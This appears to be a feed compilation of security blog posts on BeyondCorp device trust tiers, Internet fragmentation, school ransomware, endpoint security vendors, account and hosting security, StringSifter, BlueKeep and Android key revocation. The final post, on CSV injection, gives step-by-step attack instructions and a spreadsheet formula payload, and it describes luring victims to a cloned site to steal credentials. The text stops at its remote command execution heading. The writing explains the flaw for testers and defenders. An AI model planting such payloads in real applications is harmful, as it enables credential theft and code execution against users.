By separating trust from identity, we can define infinite levels of trust, if we so desired. At any point in time, we can define a new trust level, or adjust existing trust level requirements, and reevaluate a device's compliance. This is the heart of the tiered access system. It provides us the flexibility to define different device trust criteria for low sensitivity applications from those used for high trusted applications.

Solving the bootstrapping challenge

Multiple trust states enable us to use the system to initiate an OS installation. We can now allow access to bootstrapping (configuration and patch management) services based solely on whether we own the device. This enables provisioning to occur from untrusted networks allowing us to replace the traditional IP-based checks.

Configurable frequency of trust evaluations

The frequency of device trust evaluation is independent from certificate issuance in a tiered access setup. This means you can evaluate trust as often as you feel necessary. Changes to trust definitions can be immediately reflected across the entire fleet. Changes to device posture can similarly immediately impact trust.

We should note that the system’s ability to quickly remove trust from devices can be a double edged sword. If there are bugs in the trust definitions or evaluations themselves, this can also quickly remove trust from ‘good’ devices. You must have the ability to adequately test policy changes to mitigate the blast radius from these types of bugs, and ideally canary changes to subsets of the fleet for a baking period. Constant monitoring is also critical. A bug in your trust evaluation system could cause it to start mis-evaluating trust. It’s wise to add alarms if the system starts dropping (or raising) the trust of too many machines at once. The troubleshooting section below provides additional techniques to help minimize the impact of misconfigured trust logic.

How did we define access tiers?

The basic concept of tiers is relatively straightforward: access to data increases as the device security hardening increases. These tiers are useful for coarse grain access control of client devices, which we have found to be sufficient in most cases. At Google, we allow the user to choose the device tier that allows them to weigh access needs with security requirements and policy. If a user needs access to more corporate data, they may have to accept more device configuration restrictions. If a user wants more control over their device and less restrictions but don’t need access to higher risk resources, they can choose a tier with less access to corporate data. For more information about the properties of a trusted platform you can measure, visit our paper about Maintaining a Healthy Fleet.

We knew this model would work in principle, but we didn’t know how many access tiers we should define. As described above, the old model only had two tiers: Trusted and Untrusted. We knew we wanted more than that to enable trust build up at the very least, but we didn’t know the ideal number. More tiers allow access control lists to be specified with greater fidelity at the cost of confusion for service owners, security engineers, and the wider employee base alike.

At Google, we initially supported four distinct tiers ranging from Untrusted to Highly-Privileged Access. The extremes are easy to understand: Untrusted devices should only access data that is already public while Highly-Privileged Access devices have greater privilege internally. The middle two tiers allowed system owners to design their systems with the tiered access model in mind. Certain sensitive actions required a Highly-Privileged Access device while less sensitive portions of the system could be reached with less trusted devices. This degraded access model sounded great to us security wonks. Unfortunately, employees were unable to determine what tier they should choose to ensure they could access all the systems they needed. In the end, we determined that the extra middle tier led to intense confusion without much benefit.

In our current model, the vast majority of devices fit in one of three distinct tiers: Untrusted, Basic Access, and Highly-Privileged Access. In this model, system owners are required to choose the more trusted path if their system is more sensitive. This requirement does limit the finesse of the system but greatly reduces employee confusion and was key to a successful adoption.

In addition to tiers, our system is able to provide additional context to access gateways and underlying applications and services. This additional information is useful to provide finer grained, device-based access control. Imposing additional device restrictions on highly sensitive systems, in addition to checking the coarse grain tier, is a reasonable way to balance security vs user expectations. Because highly sensitive systems are only used by a smaller subset of the employee population, based on role and need, these additional restrictions typically aren’t a source of user confusion. With that in mind, please note that this article only covers device-based controls and does not address fine-grained controls based on a user’s identity.

At the other end of the spectrum, we have OS installation/remediation services. These systems are required in order to support bootstrapping a device which by design does not yet adhere to the Basic Access tier. As described earlier, we use our certificates as a device identity, not trust validation. In the OS installation case, no reported data exists, but we can make access decisions based on the inventory data associated with that device identity. This allows us to ensure our OS and security agents are only installed on devices we own and expect to be in use. Once the OS and security agents are up and running, we can use them to lock down the device and prove it is in a state worthy of more trust.

How did we create rules to implement the tiers?

Device-based data is the heart of BeyondCorp and tiered access. We evaluate trust tiers using data about each device at Google to determine its security integrity and tier level. To obtain this data, we built an inventory pipeline which aggregates data from various sources of authority within our enterprise to obtain a holistic, comprehensive view of a device's security posture. For example, we gather prescribed company asset inventory in one service and observed data reported by agents on the devices in other services. All of this data is used to determine which tier a device belongs in, and trust tiers are reevaluated every time corporate data is changed or new data is reported.

Trust level evaluations are made via "rules", written by security and systems engineers. For example, for a device to have basic access, we have a rule that checks that it is running an approved operating system build and version. For that same device to have highly-privileged access, it would need to pass several additional rules, such as checking the device is encrypted and contains the latest security patches. Rules exist in a hierarchical structure, so several rules can combine to create a tier. Requirements for tiers across device platforms can be different, so there is a separate hierarchy for each. Security engineers work closely with systems engineers to determine the necessary information to protect devices, such as determining thresholds for required minimum version and security patch frequency.

Rule Enforcement and User Experience

To create a good user experience, rules are created and monitored before being enforced. For example, before requiring all users to upgrade their Chrome browser, we monitor how many users will drop trust if that rule was enforced. Dashboards track rule impact on Googlers over 30 day periods. This enables security and systems teams to evaluate rule change impact before they affect end users.

To further protect employee experience, we have measures called grace periods and exceptions. Grace periods provide windows of a predefined duration where devices can violate rules but still maintain trust and access, providing a fallback in case of unexpected consequences. Furthermore, grace periods can be implemented quickly and easily across the fleet in case for disaster recovery purposes. The other mechanism is called exceptions. Exceptions allow rule authors to create rules for the majority while enabling security engineers to make nuanced decisions around individual riskier processes. For example, if we have a team of Android developers specializing on user experience for an older Android version, they may be granted an exception for the minimum version rule.

How did we simplify troubleshooting?

Troubleshooting access issues proves challenging in a system where many pieces of data interact to create trust. We tackle this issue in two ways. First, we have a system to provide succinct and actionable explanations to end users on how to resolve problems on their own. Second, we have the capability to notify users when their devices have lost trust or are about to lose trust. The combination of these efforts improves the user experience of the tiered access solution and reduces toil for those supporting it.

We are able to provide self-service feedback to users by closely integrating the creation of rule policy with resolution steps for that policy. In other words, security engineers who write rule policies are also responsible for attaching steps on how to resolve the issue. To further aid users, the rule evaluation system provides details about the specific pieces of data causing the failure. All this information is fed into a centralized system that generates user-friendly explanations, guiding users to self-diagnose and fix problems without the need for IT support. Likewise, a tech may not be able to see pieces of PII about a user when helping fix the device. These cases are rare but necessary to protect the parties involved in these scenarios. Having one centralized debugging system helps deal with all these nuances, enabling us to provide detailed and safe explanations to end users in accordance with their needs.

Remediation steps are communicated to users in several ways. Before a device loses trust, notification pop-ups appear to the user explaining that a loss of access is imminent. These pop-ups contain directions to the remediation system so the user can self-diagnose and fix the problem. This circumvents user pain by offering solutions before the problem impacts the user. Premeditated notifications work in conjunction with the aforementioned grace periods, as we provide a window in which users can fix their devices. If the issue is not fixed and the device goes out of compliance, there is still a clear path on what to do. For example, when a user attempts to access a resource for which they do not have permission, a link appears on the access denied page directing them to the relevant remediation steps. This provides fast, clear feedback on how to fix their device and reduces toil on the IT support teams.

Next time

In the next and final post in this series, we will discuss how we migrated services to be protected by the BeyondCorp architecture at Google.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

Thank you to the editors of the BeyondCorp blog post series, Puneet Goel (Product Manager), Lior Tishbi (Program Manager), and Justin McWilliams (Engineering Manager).

Five Thoughts on the Internet Freedom League

In the September/October issue of Foreign Affairs magazine, Richard Clarke and Rob Knake published an article titled "The Internet Freedom League: How to Push Back Against the Authoritarian Assault on the Web," based on their recent book The Fifth Domain. The article proposes the following:

The United States and its allies and partners should stop worrying about the risk of authoritarians splitting the Internet. 

Instead, they should split it themselves, by creating a digital bloc within which data, services, and products can flow freely, excluding countries that do not respect freedom of expression or privacy rights, engage in disruptive activity, or provide safe havens to cybercriminals...

The league would not raise a digital Iron Curtain; at least initially, most Internet traffic would still flow between members and nonmembers, and the league would primarily block companies and organizations that aid and abet cybercrime, rather than entire countries. 

Governments that fundamentally accept the idea of an open, tolerant, and democratic Internet but that struggle to live up to such a vision would have an incentive to improve their enforcement efforts in order join the league and secure connectivity for their companies and citizens. 

Of course, authoritarian regimes in China, Russia, and elsewhere will probably continue to reject that vision. 

Instead of begging and pleading with such governments to play nice, from now on, the United States and its allies should lay down the law: follow the rules, or get cut off.

My initial reaction to this line of thought was not encouraging. Rather than continue exchanging Twitter messages, Rob and I had a very pleasant phone conversation to help each other understand our points of view. Rob asked me to document my thoughts in a blog post, so this is the result.

Rob explained that the main goal of the IFL is to create leverage to influence those who do not implement an open, tolerant, and democratic Internet (summarized below as OTDI). I agree that leverage is certainly lacking, but I wondered if the IFL would accomplish that goal. My reservations included the following.

1. Many countries that currently reject the OTDI might only be too happy to be cut off from the Western Internet. These countries do not want their citizens accessing the OTDI. Currently dissidents and others seeking news beyond their local borders must often use virtual private networks and other means to access the OTDI. If the IFL went live, those dissidents and others would be cut off, thanks to their government's resistance to OTDI principles.

2. Elites in anti-OTDI countries would still find ways to access the Western Internet, either for personal, business, political, military, or intelligence reasons. The common person would be mostly likely to suffer.

3. Segregating the OTDI would increase the incentives for "network traffic smuggling," whereby anti-OTDI elites would compromise, bribe, or otherwise corrupt Western Internet resources to establish surreptitious methods to access the OTDI. This would increase the intrusion pressure upon organizations with networks in OTDI and anti-OTDI locations.

4. Privacy and Internet freedom groups would likely strongly reject the idea of segregating the Internet in this manner. They are vocal and would apply heavy political pressure, similar to recent net neutrality arguments.

5. It might not be technically possible to segregate the Internet as desired by the IFL. Global business does not neatly differentiate between Western and anti-OTDI networks. Similar to the expected resistance from privacy and freedom groups, I expect global commercial lobbies to strongly reject the IFL on two grounds. First, global businesses cannot disentangle themselves from anti-OTDI locations, and second, Western businesses do not want to lose access to markets in anti-OTDI countries.

Rob and I had a wide-ranging discussion, but these five points in written form provide a platform for further analysis.

What do you think about the IFL? Let Rob and I know on Twitter, via @robknake and @taosecurity.

Why Are Schools Increasingly Targeted by Cyberattackers?

Schools, including universities, are increasingly becoming cyberattack targets. Just this month, the Monroe-Woodbury school district in Orange County, NY had to delay the start of school due to cyberattacks. And this incident was only one of a handful of cyberattacks on New York state school districts this summer. One school system, Rockville Centre in Nassau County, paid a cyberattacker $88,000 after a ransomware attack shut down the district’s mainframe.

And New York is not alone. This summer, school districts in Oklahoma, New York, and Virginia have been victims of ransomware. The Louisiana governor declared a state of emergency after multiple ransomware attacks crippled several school districts, and schools in Flagstaff, AZ closed for two days this month last due to a ransomware attack.

The attacks don’t stop after grade 12 either. Two universities, Regis University in Denver, CO and Stevens Institute of Technology in Hoboken, NJ, were also targeted right before the start of this school year:

Anthony Carfora of the Lupinskie Center for Curriculum, Instruction and Technology said in an interview with CBS New York, “Ransomware is prolific right now and there’s more of it going on in government and education institutions than in private industry. We seem to be targets now.”

Why are schools being targeted?

Schools’ appeal to cyberattackers stems, in part, from the fact that most don’t have robust cybersecurity systems or personnel and struggle to prevent and respond to attacks. They have the added challenge of needing to give their students and teachers the academic freedom to learn and explore and do research. This often requires a more lax security posture than the locked down environment of an enterprise. They also house a lot of sensitive data, and are heavily reliant on software.

Another wrinkle: the users of that software might find it worthwhile to take a look under the hood. Veracode co-founder Chris Wysopal notes that, “schools use a lot of applications, which put them at the mercy of their vendors to build secure software, and requires that they have a good coordinated disclosure process to respond to security researchers, who in their case are often going to be students.”

Just last month at DEF CON, a teenager presented on all the vulnerabilities he found over the past three years in his school’s educational software. Wired reported that the teen “found a series of common web bugs in [the software], including so-called SQL-injection and cross-site-scripting vulnerabilities … those bugs ultimately allowed access to a database that contained 24 categories of data, everything from phone numbers to discipline records, bus routes, and attendance records.”

After he reported the flaws to the two software companies, he got little to no response. That is, until he used one of the vulnerabilities to trigger a push notification saying “hello” to all users. The software companies responded, and one has stated that it’s working to improve its vulnerability disclosure program.

Steps schools can take

Beyond working with vendors to ensure the security of software they are purchasing, and developing robust vulnerability disclosure programs, Wysopal recommends that schools consider “separating the administration network, which has the sensitive data the school needs to operate, from the teaching or lab network, where this data isn’t needed.” In this way, the school can maintain the academic freedoms while compartmentalizing data to reduce risk.

Want more security news and best practices? Subscribe to our content.

The Endpoint security market is booming

The Endpoint security solution is the fastest-growing category in cybersecurity, no doubt as a response to growing threats.

From all the categories in the cybersecurity world, one stands out in terms of sales volume and growth.

The Endpoint security products (also known as EPP- Endpoint security platforms) are designed to secure laptops, desktops, servers from malware. The rapid growth in this particular product category has several reasons. The first is the rise in attacks against endpoints, which is driven by financial motives. Ransomware attacks (which are targeting endpoints) have doubled in the last 12 months. When an organization is under attack, the most vulnerable assets are usually the endpoints, which host all the data and provide the attackers with access to other endpoints and servers, which they then use to identify data and encrypt it.

Ransomware and Cryptominers are the biggest threats

In addition to Ransomware, other forms of malware that target endpoints are on the raise- mainly crypto-miners, that use computing resources to produce cryptocurrencies (mainly Monero). Crypto-mining campaigns climbed 29 percent from Q4 2018 to Q1 2019. One infamous example of this trend is the discovery and takedown of a huge botnet consisting of 850,000. The computers were infected with the polymorphic miner “RETADUP”, and used the computers’ resources to mine Monero. Similarly, the

the Smominru campaign hijacked half a million PCs to mine cryptocurrency. The botnet has been active for at least two years and generally spreads through the EternalBlue exploit.

Organizations are aware of this growing, freightening trend, and respond by deploying endpoint solutions to secure themselves. Endpoint security solutions market is growing at an annual rate of 8% , from a total size of 6.5 billion USD in 2018 to an estimated 13 billion by 2022.

Endpoint security products integrate with the organizations’ security apparatus, that begins with the perimeter (Firewall, WAF), moving to the network (NTA) and terminates at the endpoints. Gartner defines EPP as “solutions deployed on endpoint devices to harden endpoints, to prevent malware and malicious attacks, and to provide…investigation and remediation capabilities.” EPP systems gradually replace legacy Anti-Virus systems, because even though both products provide the same functionality, the AV is signature-based (meaning it is only useful for detecting known malware) and EPP can identify and block new variants of malware and Zero-days.

The endpoint security market isn’t simply growing in overall market size, it is also very profitable and enjoys sizeable deal (given that enterprises have thousands of endpoint to secure). Last year, Blackberry acquired Cylance, one of main vendors, for 1.4 Billion USD. CarbonBlack IPOd and then sold to VMware for 2.1 billion, and Crowdstrike that has IPOd in June 2019, has since the saw a 150% rise in its stock price, propelling it to no.3 cybersecurity company in the world, ahead of established companies such as Checkpoint, Symantec and others.


Israeli Endpoint Security solution vendors

As far as the Israeli cyber market, the trend is similar. Several startups have identified this opportunity and developed endpoint security solutions: Nyotron, ensile, Minerva Labs. All these companies raise dozens of millions of USD and are trying to battle the huge companies oversees. The leading Israeli company is SentinelOne that was founded in 2013 and raised 230 Million USD since. The company has an Israeli R&D center, HQ in the Silicon Valley and a large sales office in Oregon. The company has 2500 global clients and its revenue is close to 100 million USD annually. Gartner has included SentinelOne in its prestigious “Magic Quadrant” research pertaining to endpoint security solutions, hailing it as “Visionary” -positioned furthest for completeness of vision (and the only Israeli endpoint security company to be included in the report. SentinelOne platform does not require any prior knowledge about the attack in order to identify the malware. This is due to intelligent machine-learning algorithm, continuously improved engines. SentinelOne uses several engines to ensure proper monitoring, identification, blocking and mitigation. SentinelOne enables defenders to quickly remediate, report and investigate the incident. Sentintelone automatic roll-back is extremely useful in terms of a ransomware attack. The company now expends the “Endpoint” security concept to new devices such as IoT device and for cloud security.





The post The Endpoint security market is booming appeared first on CyberDB.


The Internet has made our lives easier in so many ways. However, you need to know how you can protect your privacy and avoid fraud. With all of the personally identifiable information we share on social sites – Hackers have only become more adept at locating that information and using it to gain access to our accounts.

What’s worse, if you’re on social media while at work and connected to the corporate network and your account gets hacked, you’ve now made your entire company vulnerable.

Social media represents the largest modern threat vector – it has more connectivity (billions of people), it’s more trusted (everyone is your friend) and its less visibility (simply by its nature) than any other communication or business platform.

Security teams need to join their sales, marketing and customer success groups in the digital era, follow social media security best practices and implement risk monitoring and remediation technology around social media to secure their organization’s future.

In the case of social media accounts, you should make absolutely sure the email they are linked to has as much protection as possible. It’s a single point of failure. since everyone gets their password reset emails there. That’s the major way people get in.

Tips for Securing your Social Media Accounts
Create a unique email for social media. If you are compromised, hackers won’t have access to any other valuable information.

Limit Biographical Information. Many social media websites require biographical information to open an account –You can limit the information made available to other social media users.

Enable two-factor authentication. This is one of the best methods for protecting your accounts from unauthorized access.

Close unused accounts. With security, you can’t take the approach of ‘out of sight, out of mind,’ so it’s best to terminate your account altogether if it’s no longer in use.

Update mobile apps regularly. These updates can protect you from threats that have already been identified.

Practice good password hygiene. Pick a “strong” password, keep it secure, change it frequently, and Use different passwords for different accounts.

Monitor your accounts regularly. The sooner you notice suspicious activity, the sooner you can recover your account.

Secure your mobile devices. If your mobile devices are linked to your social media accounts, make sure that these devices are password protected in case they are lost or stolen.

Adjust the default privacy settings. Lock down your account from the start. Select who can see what posts, when and what information is shown on your profile, to who.

Be mindful accessing accounts on public wireless.If you have to connect, log completely out of your account after your session.

Accept friend requests selectively. There is no obligation to accept a “friend” request of anyone you do not know or do not know well. Fake accounts are often used in social engineering.

Use caution with public computers or wireless connections. Try to avoid accessing your social media accounts on public or other shared computers. But if you must do so, remember to log out completely by clicking the “log out” button on the social media website to terminate the online session.

Limit 3rd party app usage. Only authorize legitimate applications, and be sure to read the details of what you are authorizing the particular app to have access to.

What do I do If I’ve Been Hacked?
First things, don’t panic. If possible, log into your account and change your password.
Review the recent activity on the account and delete anything that was not posted by you.

If you find spam, be sure to report it.

Check your bank account and other accounts to ensure that they were not also compromised.

At this point, enable two-factor authentication.

In addition, you should know that Social media provide support to recover your account.

Major Web Hosting Hazards You Should Take Seriously

“I’ve read that my web hosting provider’s website that they have a good security solution in place to protect me against hackers.”

This is a pretty common answer that a lot of bloggers and small business owners gave me when I ask them if they know about how secure their web hosting is. Also, they often add that their budgets are pretty tight so they’ve chosen to go with “an affordable provider.” By “affordable,” of course, they mean ‘ridiculously cheap.”

Come on, people.

Do you really think that a cheap web hosting has everything in place to stop a website attack? Do you think that they will protect you from all types of hacker attacks?

While I don’t know everything about how web hosting providers choose security solutions, I can tell you with some confidence that a lot of them have laughable solutions.

If you don’t believe me, you can Google something like “Hacked website stories” and you’ll see that many web hosting companies, from some of the cheapest to even some well-known ones – don’t have adequate security solutions in place. As a result, lots of people have lost their websites. These horror stories are quite common, and even a simple Google search can return a lot of them.

Shocking Stats

Unfortunately, hackers are becoming more and more skilled at what they do, and stats support this. If you visit the live counter of hacked websites on Internet Live Stats, you’ll discover that at least 100,000 websites are hacked DAILY (for example, I visited the counter at 7:07 pm and it showed that 101,846 websites have been hacked since 12 am).

From what I saw on Internet Live Stats, I could tell that one website was hacked every second. This is horrible, and one of the bad things about this was that many of the owners of these websites thought that they were protected by their web hosting provider.

The next bad thing about all of this is that the number of websites hacked daily is getting higher. For example, there were about 30,000 websites hacked a day in 2013 according to this Forbes piece, but as we could see on the live counter, this number has more than tripled in 2019. If this negative trend continues, then we could easily see even more website owners losing their business on a daily basis very soon.

While this information is certainly alarming, website owners are typically to blame for the fact that their website was stolen from them (not trying to be rude here at all). If we dig a little bit deeper into the data on hacked websites, we discover that many use ridiculously simple passwords, poor hosting providers, outdated content management systems (CMS), and do other unwise things that help hackers get in.

For example, many bloggers want to focus on content writing, editing, and lead building rather than think about stuff like hosting. While content proofreading is something they could get help with by using numerous online tools like, Grammarly and Hemingway Editor, getting quality assistance with a hacked website is a whole new ballgame.

Next, there’s an issue with passwords. According to a recent survey by the UK’s National Cyber Security Centre (NCSC), 23.2 million web accounts they’ve analyzed had “123456” as a password. Moreover, about 7.7 million people relied on “123456789” for protection of their data, while “password” and “qwerty” were also quite popular with about 3 million users each.

While a password is something that could be changed in a matter of seconds to protect your site against brute force attacks, it may not protect you from most cyber threats. This is the responsibility of a hosting provider, and unfortunately, a lot of people disregard this requirement for web security.

That’s why we’re going to talk about hosting security issues that you should protect your site from.

How Web Hosting Affects the Security of Your Website

Before we talk about major web hosting hazards, let’s quickly discuss the connection between the security of your website and the web hosting you’re using. I’m going to say this right away: choosing a web hosting provider is one of the most important decisions you’ll make when setting up for your website, and the implications go way beyond security.

For example, if you’re a blogger or a business owner, you’ll get:

  • A high level of protection against hackers. “This means that you’ll be able to concentrate on content creation,” says Peter O’Brien, a content specialist from Studicus. “If I selected a poor host, I wouldn’t spend so much doing the creative stuff, that’s for sure”
  • A fast loading time. People don’t like to wait; in fact, Google claims that websites that load within 5 seconds have 70 percent longer visitor sessions, 35 lower bounce rates, and 25 percent higher viewability compared to websites that load between 5 and 19 seconds. That’s why Google has released the mobile-first indexing update and designed own PageSpeed Insights tool to help users optimize the performance of their websites
  • High reliability and uptime. Most web hosting companies claim that the websites they service are online for 99.9 percent of the time, but the real time can vary and depends on the quality of the provider.
  • Better security. This one means that different web hosting providers have different security packages, therefore the websites they power have different protection from hackers. Moreover, a good host can help you to recover quickly in case if you’ve suffered an attack.

Let’s talk a little bit more about the last bullet point. So, how can one tell that their hosting provider is poor? That’s pretty easy:

  • Slow loading times. If your website loads for more than five seconds, then chances are that its performance is affected by the hosting provider that has put a lot of sites into one server
  • Frequent security issues. If your website doesn’t have backups and suffers from various cyber attacks often, then you should definitely talk to your provider (make sure that your passwords aren’t the problem)
  • Regular unexpected downtime. A poor choice of a web hosting provider often leads to this problem, which, in turn, is often caused by overloaded servers. In other words, the provider simply can’t handle the volume of visitors that your website (and other websites hosted on that server) are experiencing.

So, to sum up, the quality of hosting is essential for the success of your online venture, and making a poor choice can lead to disappointing outcomes (just remember the figures from the live counter again). But with so many websites getting hacked on a daily basis, what do you need to know to protect your own one? Read the next section to know.

Beware of these Major Web Hosting Hazards

  1. Shared Hosting Issues

Sharing hosting is a tricky business, and you don’t know how many websites are on the server where your own one lives. It’s quite possible that the number is quite high, up to a thousand, and this could be one of the reasons why your website might be underperforming.

For example, this discussion threat had some interesting information on this. A person asked how many websites are typically served on one shared server, and some of the answers were astonishing! For example, one user responded by writing the following.

Can you believe it? 800 websites on one server! Talk about performance issues, right?

While I realize that a single server can host up to several thousand websites, can you imagine what would happen if at least ten of them are high-traffic ones? Think crashes, slow loading times, unplanned downtime, and lots of other issues.

Since people are always looking to save costs, chances are that shared hosting issues will continue to impact a lot of websites.

  1. Attacks that Exploit an outdated version of PHP

It’s a known fact that about 80 percent of all websites in 2018 ran on PHP. However, since the beginning of 2019, the support for PHP 5.6x will be ended, meaning that all support for any version of PHP 5.x is gone. In other words, the sites that fail to update won’t get any security patches, bug fixes, and updates.

However, recent reports suggest that this news didn’t trigger any massive moves to the newer versions of PHP. For example, according to Threat Post, about 62 percent of all server-side programming websites are still using PHP version 5. Here are the full data.

Source: Threat Post

“These sites probably include old libraries that haven’t had the joy of an update…” the abovementioned Threat Post post cited a web security expert, as saying. “The libraries probably have bugs and security holes in themselves, never mind the hosting platform or the website code itself. In some cases library code can be updated easily, others not.”

For hackers looking for some business, this means that they have a lot of work to do. Can you imagine it: since the beginning of this year, more than 60 percent of websites stopped getting security updates!

“Faced with the urgent requirement to update the PHP version, a lot of websites owners will make a corresponding request for their web hosting providers,” shares Sam Bridges, a web security specialist from Trust My Paper. “This means that the latter will face a flood of support requests, which could translate into a slow pace of the update process.”

On top of that, some providers may not be willing to notify their users about the requirement to update their PHP versions, so a lot of websites may still be using outdated ones in the next few years.

Well, hopefully you’re not going to be one of them.

  1. More Sophisticated DDoS Attack Techniques

DDoS attacks are nothing new. However, they are still a common type of a cyberweapon used against websites that should be considered when choosing a hosting provider. In fact, the situation here is a lot more complicated than one thinks.

For example, the research suggests that the total number of DDoS attacks has decreased by 13 percent in 2018, which may seem like a positive signal by many.

The comparison of the number of DDoS attacks between 2017 and 2018. Source: Kaspersky

Unfortunately, the stats don’t provide the big picture here. According to Kaspersky, hackers are reducing the number of attempts to break into websites using DDoS attacks, but they are turning to more advanced and sophisticated attack techniques.

For example, it was found that the average length of attacks has increased from 95 minutes in the first quarter of 2018 to 218 minutes in the fourth quarter of 2018. While it means that the protection against this kind of attacks is getting better, it also suggests that the malefactors are becoming more selective and skilled.


For example, 2018 has seen the biggest DDoS attacks in history; one of these situations involved a U.S.-based website that reported a 1.7 TB/s assault (this means that the attackers overwhelmed the site with a massive wave of traffic hitting 1.7 terabytes per second!), according to The Register.

Source: The Register

Therefore, we may see an increase in unresponsive websites due to DDoS attacks in the next years (clearly, not a lot of websites can survive an attack like this one), as hackers deploy more sophisticated techniques.

Since a lack of DDoS-protected hosting is a major risk factor in this situation, make sure that your hosting provider has this protection in place.

Stay Protected

Web hosting is not the first thing that many website owners think about when setting up their businesses, but it’s definitely one that could make or break them. The success of your venture ultimately depends on the uptime, loading time, and overall reliability of your website, so being aware of the threats that you can face in the nearest future could help you to avoid losing your website and joining those 100,000+ unfortunate sites owners who get their sites hacked every day.

Hopefully, this article was a nice introduction to the importance of web hosting and the risks that come with it. Remember: if you want your data to be protected, pay attention to the existing and emerging risks right now and make appropriate decisions. Eventually, this’ll pay you nicely by maximizing uptime and reliability of your website.


Dorian Martin is a frequent blogger and an article contributor to a number of websites related to digital marketing, AI/ML, blockchain, data science and all things digital. He is a senior writer at WoWGrade, runs a personal blog NotBusinessAsUsusal and provides training to other content writers.

The post Major Web Hosting Hazards You Should Take Seriously appeared first on CyberDB.

Open Sourcing StringSifter

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings that can quickly evoke analyst fatigue, relevant strings occur less often than irrelevant ones, and the definition of "relevant" can vary significantly among analysts. Mistakes can lead to missed clues that would have reduced overall time spent performing malware analysis, or even worse, incomplete or incorrect investigatory conclusions.

Earlier this year, the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams published a blog post describing a machine learning model that automatically ranked strings to address these concerns. Today, we publicly release this model as part of StringSifter, a utility that identifies and prioritizes strings according to their relevance for malware analysis.


StringSifter is built to sit downstream from the Strings program; it takes a list of strings as input and returns those same strings ranked according to their relevance for malware analysis as output. It is intended to make an analyst's life easier, allowing them to focus their attention on only the most relevant strings located towards the top of its predicted output. StringSifter is designed to be seamlessly plugged into a user’s existing malware analysis stack. Once its GitHub repository is cloned and installed locally, it can be conveniently invoked from the command line with its default arguments according to:

strings <sample_of_interest> | rank_strings

We are also providing Docker command line tools for additional portability and usability. For a more detailed overview of how to use StringSifter, including how to specify optional arguments for customizable functionality, please view its README file on GitHub.

We have received great initial internal feedback about StringSifter from FireEye’s reverse engineers, SOC analysts, red teamers, and incident responders. Encouragingly, we have also observed users at the opposite ends of the experience spectrum find the tool to be useful – from beginners detonating their first piece of malware as part of a FireEye training course – to expert malware researchers triaging incoming samples on the front lines. By making StringSifter publicly available, we hope to enable a broad set of personas, use cases, and creative downstream applications. We will also welcome external contributions to help improve the tool’s accuracy and utility in future releases.


We are releasing StringSifter to coincide with our presentation at DerbyCon 2019 on Sept. 7, and we will also be doing a technical dive into the model at the Conference on Applied Machine Learning for Information Security this October. With its release, StringSifter will join FLARE VM, FakeNet, and CommandoVM as one of many recent malware analysis tools that FireEye has chosen to make publicly available. If you are interested in developing data-driven tools that make it easier to find evil and help benefit the security community, please consider joining the FDS or FLARE teams by applying to one of our job openings.

ACSC confirms the public release of BlueKeep exploit

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of the overnight release of a working exploit for the vulnerability known as BlueKeep (CVE-2019-0708). Australian businesses and users of older versions of Windows should update their systems as soon as practically possible, before hackers further refine their tools and tradecraft in order to fully utilise this exploit.

Trust but verify attestation with revocation

Posted by Rob Barnes & Shawn Willden, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]

Billions of people rely on their Android-powered devices to securely store their sensitive information. A vital component of the Android security stack is the key attestation system. Android devices since Android 7.0 are able to generate an attestation certificate that attests to the security properties of the device’s hardware and software. OEMs producing devices with Android 8.0 or higher must install a batch attestation key provided by Google on each device at the time of manufacturing.
These keys might need to be revoked for a number of reasons including accidental disclosure, mishandling, or suspected extraction by an attacker. When this occurs, the affected keys must be immediately revoked to protect users. The security of any Public-Key Infrastructure system depends on the robustness of the key revocation process.
All of the attestation keys issued so far include an extension that embeds a certificate revocation list (CRL) URL in the certificate. We found that the CRL (and online certificate status protocol) system was not flexible enough for our needs. So we set out to replace the revocation system for Android attestation keys with something that is flexible and simple to maintain and use.
Our solution is a single TLS-secured URL ( that returns a list containing all revoked Android attestation keys. This list is encoded in JSON and follows a strict format defined by JSON schema. Only keys that have non-valid status appear in the list, so it is not an exhaustive list of all issued keys.
This system allows us to express more nuance about the status of a key and the reason for the status. A key can have a status of REVOKED or SUSPENDED, where revoked is permanent and suspended is temporary. The reason for the status is described as either KEY_COMPROMISE, CA_COMPROMISE, SUPERSEDED, or SOFTWARE_FLAW. A complete, up-to-date list of statuses and reasons can be found in the developer documentation.
The CRL URLs embedded in existing batch certificates will continue to operate. Going forward, attestation batch certificates will no longer contain a CRL extension. The status of these legacy certificates will also be included in the attestation status list, so developers can safely switch to using the attestation status list for both current and legacy certificates. An example of how to correctly verify Android attestation keys is included in the Key Attestation sample.

Data Extraction to Command Execution CSV Injection

As web applications get more complex and more data driven, the ability to extract data from a web application is becoming more common. I work as a principal penetration tester on Veracode’s MPT team, and the majority of web applications that we test nowadays have the ability to extract data in a CSV format. The most common software installed in corporate environments is Microsoft Excel, and this software has the ability to open CSV files (in most cases, this is the default). It should be noted that this type of attack would also affect LibreOffice as it would also interpret the payload as formula.

Attack Requirements

In order to perform a basic attack, a number of requirements are needed. An attacker needs the ability to inject a payload into the tables within the application. The application needs to allow a victim to download this data into CSV format that can then be opened in Excel. This would cause the payload to be interpreted as an Excel formula and run.

Basic Attack

1. Search the application to find a location where any data input can be extracted.

2. Inject Payload =HYPERLINK(“ “, “Click for Report”)

3. Confirm the application is vulnerable to this type of attack. Extract the data and confirm the payload has been injected by opening the CSV file in Microsoft Excel.

4. You can then see a “Click for Report link” in the Excel File. This indicates the payload has been injected correctly.

In this scenario, when the victim clicks on the link, it will take them to the Veracode website. This type of attack might not seem too serious, but consider the following:

Instead of redirecting an end user to the Veracode website, we could redirect the end user to a server we controlled, which contained a clone of the website. We could then ask the victim to authenticate to our clone website, allowing us as the attacker to steal his or her credentials. We could then use these credentials on the original website and have access to all his or her personal information or any functionality the account has access to. There are also a number of other attacks possible with this type of formula injection, including exfiltrating sensitive data, obtaining remote code execution, or even reading the contents of certain files under the right circumstances. We can look at one of these types of attacks below.

Advance Attack – Remote Command Execution

